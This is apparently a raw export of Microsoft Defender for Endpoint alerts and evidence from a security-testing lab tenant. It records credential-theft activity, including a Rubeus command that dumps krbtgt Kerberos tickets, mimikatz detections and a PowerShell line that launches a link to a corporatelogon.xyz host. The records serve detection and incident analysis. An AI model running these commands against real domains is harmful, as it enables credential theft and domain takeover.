"2022-11-21T02:33:42.4457797Z", "parentProcessFileName": "PSEXESVC.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 9656, "processCommandLine": "\"cmd\" /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-11-21T02:33:42.6398487Z", "processId": 1468, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "f1efb0fddc156e4c61c5f78a54700e4e7984d55d", "sha256": "b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" }, { "aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c", "accountName": "ronhd", "detectionStatus": "Detected", "deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:36:16.5566667Z", "fileName": "Rubeus.exe", "filePath": "C:\\Temp", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:33:42.6398487Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 1468, "processCommandLine": "Rubeus.exe dump /service:krbtgt /user:steve ", "processCreationTime": "2022-11-21T02:33:42.678616Z", "processId": 9828, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": "ronhd@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1111", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:12:07.6266667Z
Unknown
None
ronhd
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045931511124826_-2037955442
72e5ed84-28b4-4e06-b94e-0fc890c34332
765
MicrosoftDefenderForEndpoint
2022-11-21T02:05:51.1125047Z
2022-11-21T02:07:53.5833333Z
null
2022-11-21T01:55:47.8840459Z
2022-11-21T02:02:27.3917772Z
Suspicious System Owner/User Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1033", "T1059.001", "T1087.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:05:51.15Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:05:51.15Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'", "processCreationTime": "2022-11-21T02:01:28.4753286Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:05:51.15Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": null, "parentProcessId": 4684, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-11-10T07:07:26.0872385Z", "processId": 4680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930194212558_-1890628217
155858e8-eed2-4929-9454-8ee5dbbfe802
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:39.4212766Z
2022-11-21T02:39:14.6866667Z
null
2022-11-21T02:01:39.5403186Z
2022-11-21T02:36:24.5019551Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
null
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:39.6566667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:59:44.0733333Z
Suspicious
None
bob
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-500
null
Defender@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001153087713483_-1259269531
225be4a3-4843-447d-8d5d-701ab5c04a1f
486
MicrosoftDefenderForEndpoint
2022-09-30T06:15:08.7713685Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:11:27.4225532Z
2022-09-30T06:11:51.5727687Z
Suspicious RDP session
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
SuspiciousActivity
Resolved
High
20
TerminatedBySystem
TruePositive
SecurityTesting
WindowsDefenderAtp
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1021.001", "T1555", "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "None", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:15:08.81Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-09-30T06:15:08.81Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved", "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-09-30T06:15:08.81Z", "fileName": "Rubeus.exe", "filePath": "C:\\M365DAttack\\Rubeus", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": "Timed out because a pending action was not approved,Timed out because a pending action was not approved", "sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7", "sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-09-30T06:15:08.81Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-09-30T05:36:50.2133333Z
Suspicious
None
svc_acct
null
S-1-5-21-2300221942-1987151257-321556088-1104
null
null
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
7,068
powershell.exe -command " $Process = New-Object System.Diagnostics.Process; $Process.StartInfo.FileName = 'https://nam12.safelinks.protection.outlook.com/?url=http%3A%2F%2Fgcajebahdi.corporatelogon.xyz%2Fab%2Fjnkmbkkdnlgedc&data=05%7C01%7Cjeff%40msdxv2.m365dpoc.com%7Cca409616a82145bd6a5f08daa2a10255%7C1a49212958c8401191cd245285f5345c%7C0%7C0%7C638001109710345383%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=FyEjRS5qOd2SkJELlueibuxLFMYNjL7fz8EbuOAvFwg%3D&reserved=0'; $Process.StartInfo.UseShellExecute = $true; $Process.Start() | Out-Null; "
2022-09-30T05:06:43.3390523Z
7,116
2022-09-30T05:06:43.3100364Z
null
null
null
null